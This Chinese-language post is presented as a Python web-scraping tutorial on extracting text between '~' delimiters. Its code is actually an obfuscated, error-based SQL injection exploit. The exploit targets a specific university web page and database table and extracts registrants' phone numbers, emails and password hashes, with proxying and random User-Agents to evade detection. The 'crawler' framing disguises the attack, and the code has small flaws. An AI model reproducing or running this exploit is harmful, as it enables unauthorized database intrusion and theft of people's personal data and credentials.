Python 爬虫: 如何从 Response 中提取特定数据 (使用 '~' 作为分隔符)

以下是用 Python 编写的一个爬虫代码，它可以从 Response 中提取特定数据，并将其写入到 output.txt 文件中。该代码使用 '~' 作为分隔符来定位所需的数据。

import requests
import random

# 随机 User-Agent
user_agents = [
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3",
    "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
]

# 使用随机的 User-Agent 头
def get_random_user_agent():
    return random.choice(user_agents)

proxies = {'http': 'http://127.0.0.1:7890', 'https': 'http://127.0.0.1:7890'}

# 请求数据
def request_data(query, column_name, table_name, url, lastchaxun):
    headers = {
        'User-Agent': get_random_user_agent()
    }

    params = {
        'id': query + "(%2f**%2f%2f**%2fsElEcT+1+%2f**%2f%2f**%2ffRoM(%2f**%2f%2f**%2fsElEcT+count(*),%2f**%2f%2f**%2fcOnCaT((%2f**%2f%2f**%2fsElEcT(%2f**%2f%2f**%2fsElEcT(%2f**%2f%2f**%2fsElEcT+%2f**%2f%2f**%2fcOnCaT(0x7e,ifnull(column_names,char(32)),0x7e)+%2f**%2f%2f**%2ffRoM+encuentro08.inscriptos_09+%2f**%2f%2f**%2flImIt+1772,1))+%2f**%2f%2f**%2ffRoM+information_schema.%2f**%2f%2f**%2ftAbLeS+%2f**%2f%2f**%2flImIt+0,1),floor(rand(0)*2))x+%2f**%2f%2f**%2ffRoM+information_schema.%2f**%2f%2f**%2ftAbLeS+%2f**%2f%2f**%2fgRoUp%2f**%2fBy+x)a)" + lastchaxun
    }

    response = requests.get(url, params=params, headers=headers, proxies=proxies, verify=False, timeout=10)
    return response.text

if __name__ == '__main__':
    url = "https://fido.palermo.edu/servicios_dyc/noticiasdc/mas_informacion.php?id_noticia=1140"  # please fill actual url.
    query = "+and+1="
    lastchaxun = "+and+1=1"
    column_names = ["celular", "email2", "telefono", "contraseniacrypt"]
    table_name = "encuentro08.inscriptos_09"

    # 储存数据
    with open('output.txt', 'w', encoding='utf-8') as f:
        for column_name in column_names:
            response_text = request_data(query, column_name, table_name, url, lastchaxun)
            response_text = response_text[response_text.index('~')+1:response_text.index('~1')]
            f.write("Data for {}: {}
".format(column_name, response_text))

本代码展示了如何利用 Python 爬虫技术从网站获取数据，并使用特定分隔符来提取所需信息。希望本教程能够帮助您更好地理解 Python 爬虫和数据提取的相关知识。

Python 爬虫: 如何从 Response 中提取特定数据 (使用 '~' 作为分隔符)